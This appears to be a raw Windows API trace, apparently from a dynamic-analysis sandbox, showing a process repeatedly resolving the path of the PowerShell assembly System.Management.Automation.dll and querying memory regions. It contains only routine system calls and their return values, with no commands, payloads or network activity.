	[0336.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.810] VirtualQuery (in: lpAddress=0x26b990, lpBuffer=0x26c850, dwLength=0x30 | out: lpBuffer=0x26c850*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.811] VirtualQuery (in: lpAddress=0x26b990, lpBuffer=0x26c850, dwLength=0x30 | out: lpBuffer=0x26c850*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.811] VirtualQuery (in: lpAddress=0x26b990, lpBuffer=0x26c850, dwLength=0x30 | out: lpBuffer=0x26c850*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.811] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.811] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.812] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.812] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.812] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.812] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.812] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.812] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.812] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.812] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.812] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.813] VirtualQuery (in: lpAddress=0x26b5c0, lpBuffer=0x26c480, dwLength=0x30 | out: lpBuffer=0x26c480*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.813] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.813] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.813] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.813] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.813] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x16260439, Data2=0x5443, Data3=0x4852, Data4=([0]=0xbf, [1]=0x0, [2]=0xf4, [3]=0x63, [4]=0x92, [5]=0xd1, [6]=0x8, [7]=0xcc))) returned 0x0
	[0336.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.814] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x72312b69, Data2=0x75fb, Data3=0x4bce, Data4=([0]=0x90, [1]=0x95, [2]=0x7, [3]=0xdb, [4]=0x6d, [5]=0x2d, [6]=0xa5, [7]=0x16))) returned 0x0
	[0336.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.817] VirtualQuery (in: lpAddress=0x26aff0, lpBuffer=0x26beb0, dwLength=0x30 | out: lpBuffer=0x26beb0*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.818] VirtualQuery (in: lpAddress=0x26aff0, lpBuffer=0x26beb0, dwLength=0x30 | out: lpBuffer=0x26beb0*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.818] VirtualQuery (in: lpAddress=0x26b080, lpBuffer=0x26bf40, dwLength=0x30 | out: lpBuffer=0x26bf40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.819] VirtualQuery (in: lpAddress=0x26aff0, lpBuffer=0x26beb0, dwLength=0x30 | out: lpBuffer=0x26beb0*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.819] VirtualQuery (in: lpAddress=0x26b080, lpBuffer=0x26bf40, dwLength=0x30 | out: lpBuffer=0x26bf40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.820] VirtualQuery (in: lpAddress=0x26aff0, lpBuffer=0x26beb0, dwLength=0x30 | out: lpBuffer=0x26beb0*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.820] VirtualQuery (in: lpAddress=0x26b080, lpBuffer=0x26bf40, dwLength=0x30 | out: lpBuffer=0x26bf40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
